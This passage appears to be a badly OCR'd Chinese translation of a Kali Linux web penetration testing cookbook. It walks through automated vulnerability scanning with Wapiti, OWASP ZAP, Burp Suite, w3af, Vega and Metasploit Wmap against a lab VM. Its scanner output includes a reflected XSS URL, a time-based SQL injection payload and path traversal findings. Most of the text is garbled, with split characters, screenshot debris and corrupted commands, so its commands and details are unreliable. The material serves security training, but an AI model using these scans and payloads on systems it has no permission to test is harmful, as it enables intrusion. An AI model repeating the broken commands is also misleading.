e -Plugins «plugins» : 选择 在 扫描 中 使 用 哪个 插件 (默认 为 全 部 ) o 


e -port «port number» : 如 果 服 务 器 使 用 非 标准 端口 (80，443) ， 我 们 可 能 会 以 这 个 选 
项 来 使 用 Nikto 。 


5.2 使 用 Wapiti 发 现 漏洞 
Wapiti 是 另 一 个 基于 终端 的 Web 漏洞 扫描 器 ， 它 发 送 GET 和 POST 请 求 给 目标 站 点 ， 来 寻 
找 下 列 漏 洞 (<http://wapiti. sourceforge.net/» ) 

e 文件 泄露 

e 数据 库 注入 

e XSS 

e 命令 执行 检测 

e CRLF EA 

e XXE (XML 外 部 实体 ) 注入 

o 已 知 潜在 危险 文件 的 使 用 

e 可 被 绕 过 的 ,htaccess 弱 配 置 

e 提供 敏感 信息 的 备份 文件 (源码 泄露 ) 


这 个 秘籍 中 ， 我 们 使 用 Wapiti 来 发 现 我 们 的 测试 应 用 上 的 漏洞 ， 并 生成 扫描 报告 。 


TETTE JE 


1， 我 们 可 以 从 终端 窗口 打开 Wapiti， 例 如 : 


wapiti http://192.168.56.102/peruggia/ -o wapiti result -f html -m "-blindsql" 


我 们 会 打 描 vulnerable vm 中 的 Peruggia 应 用 ， 将 输出 保存 为 HTML 格式 ， 保 存 
到 wapiti result 目录 中 ， 并 跳 过 SQL A 7N] ° 


2. 如果 我 们 打开 了 报告 目录 ， 和 index.htm 文件 ， 我 们 会 看 到 一 些 这 样 的 东西 : 





Wapiti scan report = OWASP Mantra a - 
| | Wapiti scan report x Ey 
| €- Es file:///root/wapiti. result/index html Googe € E37 C| A $ 
| 本 
.;$ Wapiti vulnerability report for http://192.168.56.102 

* [peruggia/ 
Pi Date of the scan: Thu, 13 Aug 2015 04:15:43 +0000. Scope of the web scanner : tolde 
e MEUS 
a Summary 
iy Category Humber of vulnerabilities found 
LC] 
g^ cuisine seping 12 
© Htaccess Bypass 0 
packup file n 
te 
(gg 59LInlacton ù 
(^ Bind SOL Injection i 
File Handling 2g 
Potentially dangerous lile ü 
CPLF Injection 0 
Commands execution 0 L 


这 里 ， 我 们 可 以 看 到 Wapiti 发 现 了 12 个 XSS 和 20 个 文件 处 理 漏洞 。 
3， 现 在 点 击 Cross Site Scripting ( 跨 站 脚本 ) ° 


4. 选项 某 个 漏洞 并 点 击 HTTP Request 。 我 们 选择 第 二 个 ， 选 中 并 复制 请 求 的 URL 部 分 。 


Vulnerability found in /peruggia/index.php 


Description HTTP Request cURL command lina 





5， 现 在， 我 们 将 URL 粘贴 到 浏览 器 中 ， 像 这 
样 . http://192.168.56.102/ peruggia/index.php?action-comment&pic id=%3E%3C%2Fform%3E%: 


Oo 


Peruggia 1.2 x 


192.1568.55.102/perugqia/ini hr t enit | 22e "fari nt»alert i El E rt 


.e 


我 们 确实 发 现 了 XSS 漏洞 。 


工作 原理 


这 个 秘籍 中 ， 我 们 跳 过 了 SQL 8 EJ] ( -m "-blindsql" ) ， 因 为 这 个 应 用 存在 这 个 漏洞 。 
它 会 触发 超时 错误 ， 使 Wapiti 在 扫描 完成 之 前 关闭 ， 因 为 Wapiti 通过 输入 sleep) 命令 来 测 
试 多 次 ， 直 到 服务 器 超过 了 超时 门槛 。 同 时 ， 我 们 为 输出 选择 了 HTML 格式 

( -o html ) * wapiti result 作为 报告 的 目标 目录 ， 我 们 也 可 以 选择 其 他 格式 ， 例 如 ， 
JSON、OpenVAS、TXT 或 XML。 


Wapiti 拥有 一 些 其 它 的 有 趣 的 选项 ， 它 们 是 : 
e -x <URL> : 从 扫描 中 排除 特定 的 URL， 对 于 登 出 和 密码 修改 URL 很 实用 。 


e -i «file» : 从 XML 文 件 中 恢复 之 前 保存 的 扫描 。 文 件 名 称 是 可 选 的 ， 因 为 如 果 忽 略 的 
i& Wapiti 从 scan 文件 夹 中 读 取 文件 。 


e -a <login%password> :为 HTTP 和 登录 使 用 特定 的 证 书 。 


e  ..auth-method «method» :为 -a 选项 定义 授权 方式 ， 可 以 


为 basic ， digest °’ kerberos 或 ntlm ° 
e -s <URL> : 定义 要 扫描 的 URL ° 


e -p «proxy url» : 使 用 HTTP 或 HTTPS 代理 。 


5.3 使 用 OWASP ZAP 扫 搞 漏洞 


OWASP ZAP 是 我 们 已 经 在 这 本 书 中 使 用 过 的 工具 ， 用 于 不 同 的 任务 ， 并 且 在 它 的 众多 特性 
中 ， 包 含 了 自动 化 的 漏洞 扫描 器 。 它 的 使 用 和 报告 生成 会 在 这 个 秘籍 中 涉及 。 


准备 


第 五 章 自动 化 扫描 


在 我 们 使 用 OWASP ZAP 成 功 执 行 汤 洞 扫描 之 前 ， 我 们 需要 扑 取 站 点 : 
1 打开 OWASP ZAP 并 配置 浏览 器 将 其 用 作 代 理 。 
2. Wl" 192.168.56.102/peruggia/ ° 


3. 遵循 第 三 章 “ 使 用 ZAP lk” Y ISA o 


Te TE y R 
1. 访问 OWASP ZAP 的 sites 面板 ， 并 右 击 peruggia X fF ° 


2. 访问 菜单 中 的 Attack | Active Scan 。 








Ww Site: 4 Quick Start. &* | =+ Request | Responses 
m= | 
" Ej Contexts ; Welcome to the OWASP Zed Attack Proxy (ZAP) 
| 了 Default Context ZAP is an easy to use integrated penetration testing tool for finding vulnerabilities in web applications. 
|" M Sites 
v ES Pr httpu/l92.168.56.102 Please be aware that you should only attack applications that you have been specifically been given per: 


P GET:peruggia 









To quickly test an application, enter its URL below and press "Artack', 
udi. Rudi pernuggia 
| & wGET:rob 
(| F # aGET:site 





Spider... 
A Forced Browse site 
ZR Forced Browse directory 










Inelucde imn Cantet b 
Flag as Context » 


Für ima dmm m Ls e ms D 


3. 新 的 窗口 会 弹出 。 这 里 ， 我 们 知道 我 们 的 应 用 和 服务 器 使 用 哪 种 技术 ， 所 以 ， 访 
问 Technology 标签 页 ， 并 只 勾 选 MySQL ^ PostgresQL 和 Linux ， 以 及 Apache ° 


Active Scan 





| Scope | Input Vectors | Custom vectors [ Techno 


|'* Technology 
v Db 
LjHypersonicSQL 
L-]MsSQL 
(MJMysQL 
L JOracle 
国 PostgrasQL 
r Wos 
W Linux 
L.jMacoS 
L JWindaws 
* [V]ws 
国 Apache 
Ejus 
L.]Tomcat 








| Cancel || Reset || Start Scan | 


可 
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我 们 可 以 配置 我 们 的 扫描 器 的 scope (从 哪里 开始 扫描 、 在 什么 上 下 文中 ， 以 及 其 
` Input Vectors (选项 是 否 你 打算 测试 GET 和 POST 请 求 、 协 议 头 、Cookie 和 其 
` Custom Vectors (向 原始 请 求 中 添加 特定 的 字符 或 单词 作为 攻击 向 

` Technology (要 执行 什么 技术 特定 的 测试 ) 、 以 及 policy (为 特定 测试 选项 配 


两 Ws cy cy (x 
A QE 


击 Start Scan ° 


` 
- 
- 


Active Scan 标签 页 会 出 现在 面板 顶部 ， 并 且 所 有 请 求 都 会 出 现在 那里 。 当 扫描 完成 时 ， 
我 们 可 以 在 ALerts 标签 页 中 检查 结果 。 





y ui Quick : Stam p Rackumst | | Response es 

ri amari "i OO Lu lon E 
e La 5] LA | Hier Tari =] Body Text = a| [3 [= 
r Contests JET Fi 

(8) Default Comert http://152.158.55.102/paruggia/index.php?paparzhttpW3AMzEW2E-destroy. net*zrPnach: nessizm-security*zk-P49- 14- Alen 

TE P Sites h- —————————————À HTTP/1.1 

"ES P hrtpi19z:158.56.102 User-Agent: Mozilla/4.G (compatible; MSIE 6.5; Windows NT 5.0; 

| P GETiperuggia Prajma: no-cache 


| Cache: Control: na:caclha 

| Content-Length: 9 
Rafarer: http-//1582.16568.56.1ü0z/pneruggr a/index.php?actionzlearn 
Hast: l92.168.56,107 


f us GET:rabots tid 
P o5 nET:isitema[p.aml 








"E O iEroxs Site scripting (Reflected) TA. 
T r^ Alerts [20 URL: http: MER 168.36.1 ü2iperuggiahndex. php?paperettpio34s 2.8 2F dest T Org. nets at Frnaclinest zt securtty* | 


7 = P Cross Sita Scripting (Raflected] (z] Arik 9 High 
7 GET sui 152.146 pan lü2iperuggamndexphp?arti Confidenca: Madum 
3ET TTE m HEDEEENES Parseneter ype 
Aitark- x fh s priptow alert E xiscriptia iSo 
Ewdenze — z/h5zecsenpts aesti] sfszripbe hi5 
(WF: id- Tū 


如 果 我 们 选项 某 个 敬告， 我 们 可 以 查看 生成 的 请 求 ， 以 及 从 服务 器 获得 的 响应 。 这 允许 
我 们 分 析 攻 击 并 判断 是 否 是 真正 的 漏洞 ， 或 者 是 误 报 。 我 们 也 可 以 使 用 这 个 信息 来 模糊 
测试 ， 在 浏览 器 中 重 放 这 个 请 求 ， 或 者 深入 挖掘 以 利用 。 为 了 生成 HTML 报告 ， 就 像 前 
一 个 工具 那样 ， 在 主 菜 单 中 访问 Report 之 后 选择 Generate HTML Report. o 





" M n Fath Traversal 
+ lj e Application Error Disclosure 


新 的 对 话 框 会 询问 文件 名 和 和 位置。 例如 ， 设 置 zap result. html 并 且 在 完成 时 打开 文 
件 : 








ZAP Scanning Report - OWASP Mantra es 
|; L3 ZAF Scanning Raport x &) | 
| €- mi |5file///iroot/zap result.htmi wode E E m s Co" t | 

* ZAP Scanning Report 
+ Summary of Alerts 
LI 
| - 
1 
. 
| ub 
wY Alert Detail 
| EP SE LS ES lure 
EE 
gy Description The Path Traversal attack technique allows an attacker access to Mes, directories, and commanda that potentialby reside üutslde 
tne web document root directory An attacker may manipulate a URL in such a way that the web sie will execute ar reveal the 
Cr contents of arbitrary filas amywhare on the web server. Any dmèca that exposes an HTTP-basad interface is patanitzalhy vulnerabia 
tö Path Traversal 
E | 
= Mlost web sites restrict user access to a poche portion al tha file-system, typicaly called tha "web document root ar “CGI roat? 
uw directory. These directories contain the files intended Tor user access amd the executable necessary to drive web application 
lunctionality. To access Mes or execute commands amwhere on the file-system, Path Traversal attacks wa utilize the ability af 
& special-characters sBquences. 
- 
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工作 原理 


OWASP ZAP 能 够 执行 主动 和 被 动 漏洞 扫描 。 被 动 扫描 是 OWASP ZAP 在 我 们 浏览 过 、 发 送 
数据 和 点 击 链接 程 中 进行 的 非 入 侵 测 试 。 主 动 测试 涉及 对 每 个 表单 变量 或 请 求 值 使 用 多 种 攻 
击 字符 串 ， 以 便 检 测 服务 器 的 响应 是 否 带 有 我 们 叫做 "脆弱 行为 "的 东西 。 


OWASP ZAP 使 用 多 种 技术 生成 测试 字 串 ， 它 对 于 首次 识别 目标 所 使 用 的 技术 非常 实用 ， 以 
便 优 化 我 们 的 扫描 并 减少 被 检测 到 或 导致 服务 前 溃 的 可 能 。 


这 个 工具 的 另 一 个 有 趣 特 性 是 ， 我 们 可 以 产生 于 漏洞 检测 中 的 请 求 ， 而 且 它 的 相应 响应 在 检 
测 的 时 候 会 位 于 相同 实 口 中 。 这 允许 我 们 快 读 判断 它 是 揽 正 的 漏洞 还 是 误 报 ， 以 及 是 否 要 开 
发 我 们 的 漏洞 证 明 (POC) 还 是 开始 利用 。 

| Burp Suite Professional v1.6.12 - IC ICA 


Burp intruder Repeater Window Help 


i x ———— 一 - 一 一 r E = 
Target | Proxy | Spider | Scanmer intruder | Repeater Sequencer | Decoder | Comparer | Extender | Opbons | Alerts 





L /192.168.56,102 | * e) cross-site scripting (reflected) [3] 
T "6 Saniel * ! SQL injection [2] 
S. [ peruggia/index.php [pic id parameter] 






* i images ! jperuggia/index.php [type p 
Eb index.php Cookie without Httponly fiat 

Cross-dornam Referer leakage 

TRACE method is enabled 

HTML daes not specihy charset [2] 

Filė path manipulation 

Frameable response (potential Clickjacking} [3] 

Directory listing 


Eath.ralatnsa ctula choat irinar* 


Advisory. Request 3 














issues SOL injection 

Severity, High 

Confidence Firm 

Host: http//182.168.56.102 
Path: iperuggia/index.php 


Issue detail 


The type parameter appears to be vulnerable to SOL injection attacks. The payload ' and (select * from 
(selact(s]eap( 20)))a)-- was submitted in the type parameter. The application took mora than 22032 milliseconds 
to respond to tha request. compared with 32 milliseconds for the original request, indicating that the injected SOL 
command caused a time delay. 


The database appears to be MySQL. 





P 


我 们 已 经 谈论 到 Burp Suite » Kali 只 包含 了 免费 版 本 ， 它 没有 主动 和 被 动 扫 描 特 性 。 强 烈 推 荐 
你 获得 Burp Suite 的 专业 版 许可 证 ， 因 为 它 拥有 实用 特性 和 免费 版 之 上 的 改进 ， 例 如 主动 和 
被 动 漏洞 扫描 


被 动 漏洞 扫描 在 我 们 使 用 Burp Suite 作为 浏览 器 的 代理 ， 并 浏览 网 页 时 发 生 。Burp 会 分 析 所 
有 请 求 和 响应 ， 同 时 查找 对 应 已 知 漏洞 的 模式 。 


在 主动 扫描 中 ，Burp 会 发 送 特定 的 请 求 给 服务 器 并 检查 响应 来 查看 是 否 对 应 一 些 漏洞 模式 。 
这 些 请 求 是 特殊 构造 的 ， 用 于 触发 带 有 漏洞 的 应 用 的 特定 行 


5.4 使 用 w3af 扫描 


和 命 


令 行 界面 ， 都 带 有 相同 的 功能 。 这 个 秘籍 中 ， 我 们 会 使 用 w3af 的 GUI 配 


选项 来 执行 扫描 。 


2. 


3. 


4. 


5. 


RAE 17 IR 


1. 


为 了 启动 w3af 我 们 可 以 从 应 用 菜单 栏 选 择 它 ， 通 过 浏 


Dj Applications | 03 Web Application Analysis | w3af ^*^ 或 者 从 终端 "i 


w3af gui 


在 Profiles 部 分 中 ， 我 们 选择 full audit ° 


在 插件 部 分 中 ， 访 问 crawl 并 选择 web spider (已 经 选择 的 项 目 ) 。 


w3af 支持 应 用 审计 和 攻击 框架 。 它 是 开源 的 ， 基 于 Python 的 Web 漏洞 扫描 器 。 它 拥有 GUI 
能 置 扫描 和 报告 


我 们 不 打算 让 扫描 器 测试 所 有 服务 器 ， 而 是 我 们 让 它 测 试 应 用 。 在 插件 部 分 中 ， 选 


中 only forward 选项 并 点 击 save 。 


r 


w3af — Web Application Attack and Audit Framework 





Profiles Edit Toms Configuration Help 
AT e T | A j 
ii r3 8 S «4 5s 
scan config Expibit 
Profiles Target: |http:l/target example CI 
" : p * ERUILV L3 DT MEE LI ^ 
empty. profile Active | Plugin 3 d | 
'ASP.TOP1O i 
OWASP.. 业 | BF url Fuzzar - fellow regex 
audit megh- risk urllist. tt 
Me Re nm ignare-regex and follow. regex are commonly used to configure the 
a sl web spider ta spider all URLs except the "Logout" or some othar mare 
fast scan | [f web cit 


Full audit on web. spider finish without the expected result 
full audit. spider -man 8f wordnet | 
sitemap | | | By default ignore.regex is an empty string [nothing i5 ignored) and 

wuardpress..e numerata. | 
web inlrastructure 


exciting link Like "Reboot Appliance" that would make the w3af run 


follow regex is .*' [everything is followed). Both regular expressions 


wardpress. fingerprint are normal requiar expressions that are compiled with Python's re module 


oF dpress „Full pat hdisz i 


es (=| match Function 
MEME LL. 

Active | Plugin anly-forward M 
P = output fallow regex |.* 


ignore regex 


现在 ， 我 们 会 告诉 w3af 在 完成 时 生成 HTML 报告 。 访 问 output 插件 并 选 
中 html file 。 


The raquiar expressianms are applied ta the URLa that are foung using thë 


6. 为 了 选择 文件 名 称 和 保存 报告 的 位 置 ， 修 改 output_file 选项 。 这 里 我 们 会 指定 根 目 录 下 


的 w3af report.html ^? 点 击 Save ° 


第 五 章 自动 化 扫描 


Active Plugin 
= = output 
w) (Sf console 
[1 [8f csv. file 


O Sf email report 


口 ff export requests 





W| S text.file 
C] gf xml.file 


7T. 现在 在 Target 文本 框 中 ， 输 入 打算 


|t is possible tà customize the output by changing the template which 
s used to render the output file. 


IF you want to write every HTTP request/response to a text file, you 
ould use the text. file plugin. 







'usr/sharefw3af/w3 af/plugins/output/html filef/templates/complete.! 


|| output. file |-/w3af.report.html | 





template 


verbose [] 


d , 
W Save || Lj Revert] 
"ict oa uu | 


测试 的 URL， 这 里 


是 http://192.168.56.102/WackoPicko/ ， 并 点 击 Start ° 




















Profiles Target: http-//192.168 56.102/WackoPicka/ | | 
empty-pronte Activa Plugin | p 
OWASP TOP10 = | 
| P E audit oem | 
audit high. risk b rj aus [This plugin writes the framework findings and messagas ta an HTML report 
bruteforce b hrurek 
fast i yin Three configurable parameters exist: 
ast.scan bg Fe i 
BEE outputa 
Full -audit-spřder -man b E nid | 二 | | -werbose 
ind s | - It is possibi i by changing the template which 
| pes; Active Pl It is possible to customize the output by changing template | 
a ien is used to render the output file. 
= > E output | | 
I. Sf console M you want to write every HTTP request/respansa to a text file, you 
C BE eov. file should use the text. file plugin. 
O F email repart 
template fusr/share/w3af/w3af/plagins/output/html .file/templates/camplete.! 


口 F export.requests 











€ -w3ai.reporthtm — — 0 0 | 


m f text. fila | re Ll 


8. 日 志 标 签 页 会 获 


9， 完 成 之 后 


Profdes FY Vii 
w| O m 4 
Sean config Log. Resis | Resuits Exploit. 


| KE Brera | URLs Re 


得 焦点 ， 我 们 能 


> 切换 到 Results 标签 


够 看 到 扫描 成 。 


页 ， 像 这 


进程 。 我 们 需要 等 待 它 完 


Er | pro ram. 


w3af- 192.168.56.102 = 


Tesis (Canfsyuraben Help 


rE € m». 





E Vulnerability M Information 

| Knowledge Base | 
|b blank body 

b finit aberat 

b natn. fizcinsure 

p format 
b form. autocompleta 
jh doman dat 

m id 

- sqli 


niinc. soi 
day 


b 
b 
b ijam. 935 
1. buffer overfloa 
b dot net event validation 
b 


arrer-pages 


——'á ——a[ Dj | 





in tha requazt with id 56721. 





| POST http: //182. 168. 55. 182 /WackoPicka/ 'usars/ login. php HTTP/1. L | 
| Content-Length: 43 | 
| Áccept-encoding: gaip, deflata | 


| raitsgoat ee ee Sh el SAT TS Id EUG 


|past- data was: " aisrrams ca 2753230427462 i -FrAmE3O" which mados tha "username" ni This ea oursd 


























Accept: "/* 
lUser-agenii w3af.ordg 


| 
Host: 132.188.586.102 t 
Refereri http:// 152.158.585, 1627 i 
Cookie; | 
























































(7s is Bo —— 
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10. 为 了 查看 详细 的 报告 ， 在 浏览 器 中 打开 waf report.htm; HTML 文件 。 


-— 
Application Security Scan Report for 192.168.56.102 - OWASP Mantra | 
Application Security Scan RH... x E 
€- ni FiLe:///raothw3af report html RH ug vr T # t 
* 5 
4 
"a - E i Ll : 
i oQL injection 
= HIGH 
* Summary 
s SOL injectian in a MySOL database was lourkd al: "hitpz/192.168.58 102/WackoPicko/usars/login.php'", using 
& HTTP mathod POST. Tha sant post-daia was: username-a^se /baa /d^og2&password-FrAmE30 " which | 
à modilies the "username" parameter. Thes vulnerabiliby was found in the reguasi with id 8723 
Gr 
cei Description 
uy Due ta ihe requiramant ior pe onteni of today's web applications, many raty on a database backend to 
€ store daia that wa ba called upon and prem esad by tha wab application (or other programs). Web applications 
ratriava data from tha database by using Siructured Query Language (SOL) quaries 


工作 原理 


w3af 使 用 配置 文件 来 简化 为 扫描 选择 插件 的 任务 ， 例 如 ， 我 们 可 以 定义 只 含有 SQL 注入 的 配 
置 文件 ， 它 测试 应 用 的 SQL 注入 ， 不 干 其 他 的 事情 。 full audit 配置 使 用 一 些 插 件 ， 它 们 执 
行 卜 虫 测试 、 提 取 可 以 用 作 密 码 EN 、 测 试 大 多 数 相关 的 Web 漏洞 ， 例 如 XSS >` 
SQLi、 文 件 包 含 、 目 录 人 遍历 以 及 其 它 。 我 们 修改 了 web spider 插件 来 前 向 卜 取 ， 以 便 我 们 可 
以 专注 于 打算 测试 的 应 用 ， 人 避免 扫描 "x 它 应 用 。 我 们 也 修改 了 输出 插件 来 生成 HTML 报 
告 ， 而 不 是 控制 台 输 出 和 文本 文件 。 


w3af 也 拥有 一 些 工具 ， 例 如 拦截 代理 、 模 糊 测 试 器 、 文 本 编 解 码 器 、 以 及 请 求 导 出 器 ， 它 可 
以 将 原始 的 请 求 转 换 为 多 种 语言 的 源 代码 。 
更 乡 


w3af 的 GUI 有 时 会 不 稳定 。 在 它 和 衣 演 以 及 不 能 完成 扫描 的 情况 下 ， 它 的 命令 行 界面 可 以 提供 
相同 的 功能 。 例 如 ， 为 了 执行 我 们 刚才 执行 的 相同 扫描 ， 我 们 需要 在 终端 中 做 下 列 事情 


w3af console 

profiles 

use full audit 

back 

plugins 

output config html file 

set output file /root/w3af report.html 
save 

back 

crawl config web spider 

set only forward True 

save 

back 

back 

target 

set target http://192.168.56.102/WackoPicko/ 
save 

back 

start 


5.5 使 用 Vega 42 4$ 2s 


Vega 是 由 加 拿 大 公司 Subgraph 制作 的 Web 漏洞 扫描 器 ， 作 为 开源 工具 分 发 。 除 了 是 扫描 
器 之 外 ， 它 也 可 以 用 作 拦 截 代理 ， 以 及 在 我 们 浏览 器 目标 站 点 时 扫描 


这 个 秘籍 中 ， 我 们 会 使 用 Vega 来 发 现 Web 漏洞 。 


Ey HR 


1. 从 应 用 菜单 中 选择 它 ， 访 
le] Oe | Kali Linux | Web Applications | Web Vulnerability Scanners | vega ? 


或 者 通过 终端 来 打开 Vega : 


vega 


2， 点 击 “ 开 始 新 扫描 “按钮 。 


3， 新 的 对 话 框 会 弹出 。 在 标 为 Enter a base URI for scan 的 输入 框 中 ， 输 
入 http://192.168.56.102/WackoPicko 来 扫描 应 用 。 


第 五 章 自动 化 扫描 


Select a Scan Target 


Choose a target for new scan 


-eScan Target 
( Enter a base URI for scan: 


http://192.168.56.102/WackoPicko/ 


() Choose a target scope for scan 


Web Model 
"i Include LIEN zl Si 
| 





4. 


k 


&elect Modules 


Choose which scanner modules to enable for this scan 


Select modules to run: 

* f=] Injection Modules 
W] HTTP Trace Probes 
Cl Format String Injection Checks 
| Cross Domain Policy Auditor 
XML Injection checks 
W] Eval Code Injection 
(| Blind SAL Text Injection Differential Checks 
C] Blind XPath Injection Checks 
W] X55 Injection checks 
W] Local File Include Checks 









































< Back | Next > | | Cancel | | Finish | 


5. Ad: Finish 来 开始 扫描 。 
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第 五 章 自动 化 扫描 


= 


File Sran Windew Help 





EEE ou Wo ua um Ui meme uc AL EHE 和 | 


| exmu| 











ie A 152.168 55.102 
= fWackePicke 











b [El fadmin 

P dart 

b fcoemmants 

bo ku 

bh hmages 

b — jpktures 

b — fuplnad 

b ^ lusers IE 

— Ji 

LE 
| D Scan Alerts oomen 


|| 


一 httpi/192.168.56 102 (51) 
E' LIE 
b gradum (31 
b aues (20) 
b A inro (12) 


Subgraph Vaga 


-0 o Scan info 


8 VEGA 


Scanner Progress k 


http-//192. 168.55. 102/WackoPicka/uploadidoggle/Daog 
am put of 130 scamned (30.89) 


Scan Alert Summary 


© High [9 found] 
Cieartext Password geer HTTP 
Lara File Irzlude 


Lruss Site Scripbrig 
SGL Error Detected - Possible SOL Imectian 


5L Inpection 


Pj BOB = ud 


Ak Identities E 


————XX || 
BÀ 


* Pruxy is rat runni 








35H af 241M a 


6， 当 扫描 完成 时 ， 我 们 可 以 通过 访问 左边 的 scan Alerts 树 来 检查 结果 。 漏 洞 详情 会 在 右边 


的 面板 中 展示 ， 像 这 样 


m 





Fie Scan Window Help 
(G0 X 


| Website View 





i 1 192.158.56.102 
= [7 PWackoPicka 
b 77 fadmin 


Um reper 站 心 看 -五 ü "| 
D 08/11/2015 23:35:21 [Completed ^] 
 Qhttpi/192.158.55.102 (53) 

= High (18) 


b Dextert Fasseard aver F 


gu 


b * Cross Site Scripting (2] 

b * Local Fle Include (2) 

b + Page Fingerprint Offerenti 
SOL Erro Detected- Poss 


SL Injection [2) 


* http. //182.168.56.102/ 
b riedium [4) 
P lowi 
b g inro (23) 


IE 








Subgraph Vega 


= Bj (D Scan Info: 


b ATA GLANCE 


Classification Input validation Error 
Resource http://102. 168,56. 102/W ackoPbckafuserstogin.php: 
Parameter username 


Method POST 





Debection Type Bind Text Injection Differential 
Risk | 


P REQUEST 
POST WackoPickorusersitogin.php [usernamesjoey'" passwordzvega ] 


F RESOURCE CONTENT 


E Proxy i not running 






















1B84M aF244M D 





工作 原理 


Vega 的 工作 方式 是 首先 卜 取 我 们 指定 为 目标 的 URL， 识 别 表单 和 其 它 可 能 的 数据 输入 ， 例 如 
Cookie 或 请 求 头 。 一 旦 找到 了 它们 ，Vega 尝试 不 同 的 输入 ， 通 过 分 析 响 应 并 将 它们 与 已 知 


漏洞 模式 匹配 来 识别 漏洞 。 
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在 Vega f » RMIT vA 4a 46 3E A 35 a XL ER A 8$ — 28 35, o. AXI] T XAR Eb dE 4x da dia PAE A 85 
模块 ， 来 选择 要 进行 哪 种 测试 。 同 样 ， 我 们 可 以 使 用 身份 〈 预 保存 的 用 户 /密码 组 合 ) 或 者 会 
话 Cookie 来 为 站 点 认证 ， 并 且 从 测试 中 排除 一 些 参 数 。 

作为 重要 的 缺陷 ， 它 并 没有 报告 生成 或 数据 导出 特性 。 所 以 我 们 需要 在 Vega GUI 中 查看 所 有 
的 漏洞 描述 和 详情 。 

5.6 使 用 Metasploit 的 Wmap 发 现 Web 漏洞 

Wmap 本 身 并 不 是 漏洞 扫描 器 ， 他 是 个 Metasploit 模块 ， 使 用 所 有 框架 中 的 Web 漏洞 和 服务 


器 相关 的 模块 ， 并 使 它们 协调 加 载 和 对 目标 服务 器 执行 。 它 的 结果 并 不 会 导出 为 报告 ， 但 是 
会 作为 Metasploit 数据 库 中 的 条 目 。 


这 个 秘籍 中 ， 我 们 会 使 用 Wmap 来 寻找 vulnerable vm 中 的 漏洞 ， 并 使 用 Metasploit 命令 行 
工具 来 检查 结果 。 


准备 


在 我 们 运行 Metasploit 的 控制 台 之 前 ， 我 们 需要 启动 所 连接 的 数据 库 服 务 器 ， 以 便 保 存 我 们 
生成 的 结果 : 


service postgresql start 


1， 司 动 终端 并 运行 Metasploit 控制 台 : 


msfconsole 


2， 加 载 完成 后 ， 加 载 Wmap 模块 : 


load wmap 


3 现在， 我 们 向 Wamp 中 添加 站 点 : 


wmap sites -a http://192.168.56.102/WackoPicko/ 


4. 如果 我 们 打算 查看 注册 的 站 点 : 


wmap sites -1l 


现在 我 们 将 这 个 站 点 设 为 扫描 目标 : 


wmap targets -d 0 


如 果 我 们 打算 插件 所 选 目标 ， 我 们 可 以 使 用 : 


wmap targets -1 


[WMAP 1.5.1] === 4 ] metasploit.com 2012 


Successfully 7 d plugin: wmap 
.//192.168.56.102/WackoPicko/ 


2 wmap sites 
Site created. 
z alic a 
Available 


Port Proto # Page: 


56.107 


> wmap -d 8 

Loading 192. 168. 25.182,http:// 
> wmap targets -l 

UeT-ned Largets 


SSL Path 


192. 168.56.102 182.168.56.10?2 80 false 





现在 ， 我 们 执行 测试 : 
wmap run -e 


> wmap Fun -e 
Using ALL wmap enabled modules. 
NO WMAP NODES DEFINED. Executing local modules 


resting a 
| rh 


G2 [192.168.56. 


Target is not SSL. SS 


.182:880 Apachae/2.2.14 lecti J) mod monao/2.4.3 PHP/5.3.2-lubuntu4.5 with Suhosin-Patch proxy 
aad pria 3:1 Python/2.6.5 mod ss1/2.2.14 ÜpenS3L/8.9.8k Phusion Passenger/3.0.17 mod perl/2 





8. 我 们 需要 使 用 Metasploit 的 命令 来 检查 记录 的 漏洞 : 


vulns 
wmap vulns 


13 U V in: NOt 158.55,187 name-HTITP Trace Method Al owed refs VE -2005 
377 ,DSVDB-B77 ,OSVDB -B77 ,OSVDH -877 ,BID-11604,BID-11604, BID-11604,BID-11604, .BID-95 
|-9561,BID-9561,B10-9561,810-9561 


f > wmap vL 
[192. 168. o6 ET: 12] {192.168.566.102}: file /images 
ile File faund. 
GET Res code; 434 


Le File fauni ad. 
as E ogg B: ZB 
ile /]āvascript 


T jm code: 494 
[192.168.56.182] (192.168.55.182): file /phpmyadmin 
File File fau 


192.168.56.102] ( 92.169.56 
file File found. 
GET Res code: 3 
[192.16H.55.182] (192.158.55.182) : 
file File found. 
| GET Res code: 484 
"| + [192,1568.55.1802] (192.,158,55.182] 


工作 原理 


a 





Wmap 使 用 Metasploit 44 4 2x o& 42 dii B s Ez A) fe AR 9 28 LES URL e EA Melasplolt 的 数据 库 


和 模块 中 获取 站 点 信息 ， 并 将 结果 发 送 到 数据 库 中 。 这 个 集成 的 一 个 非常 实用 的 层面 是 ， 如 
果 我 们 执行 多 个 服务 器 上 的 涂 透 测试 ， 并 且 在 测试 中 使 用 Metasploit，Wmap 会 自动 获得 所 
有 Web 服务 器 的 IP 地 址 ， 和 已 知 URL， 并 将 它们 集成 为 站 点 ， 以 便当 我 们 打算 执行 Web 
评估 时 ， 我 们 只 需要 从 站 点 列表 中 选择 目标 。 


在 执行 wmap_run 的 时 候 ， 我 们 可 以 选择 要 执行 哪个 模块 。 通 过 -m 选项 和 正则 表达 式 。 例 
如 ， 下 面 的 命令 行 会 开启 所 有 模块 ， 除 了 包含 dos 的 模块 ， 这 意味 着 没有 拒绝 服务 测试 : 


wmap run -m ^((?!dos).)*$ 


另 一 个 实用 的 选项 是 -p 。 它 允许 我 们 通过 正则 表达 式 选择 我 们 打算 测试 的 路 径 ， 例 如 ， 在 下 


一 个 命令 中 ， 我 们 会 检查 所 有 包含 单词 login 的 URL e 


wmap run -p ^.*(login).*$ 


' 如果 我 们 打算 导出 我 们 的 扫描 结果 ， 我 们 总 是 可 以 使 用 Metasploit 的 数据 库 特性 。 例 
如 ， 在 MSF 控制 台中 使 用 下 列 命令 来 将 整个 数据 库 导 出 为 XML 文件 。 


db export -f xml /root/database.xml 


第 六 章 利用 -ERGE 


作者 : Gilberto Najera-Gutierrez 
译 者 : 飞龙 


Wu : CC BY-NC-SA 4.0 


简介 


这 章 开 始 我 们 会 开始 涉及 渗透 测试 的 的 利用 层面 。 和 漏洞 评估 的 主要 不 同 是 ， 漏 洞 评估 中 测 

试 者 识别 漏洞 (多 数 时 间 使 用 上 自动 化 扫描 器 ) 和 提出 如 何 减 轻 它 们 的 建议 。 而 渗透 测试 中 测 

试 者 作为 亚 意 攻击 者 并 尝试 利用 检测 到 的 漏洞 ， 并 得 到 最 后 的 结果 : 整个 系统 的 沦陷 ， 内 部 

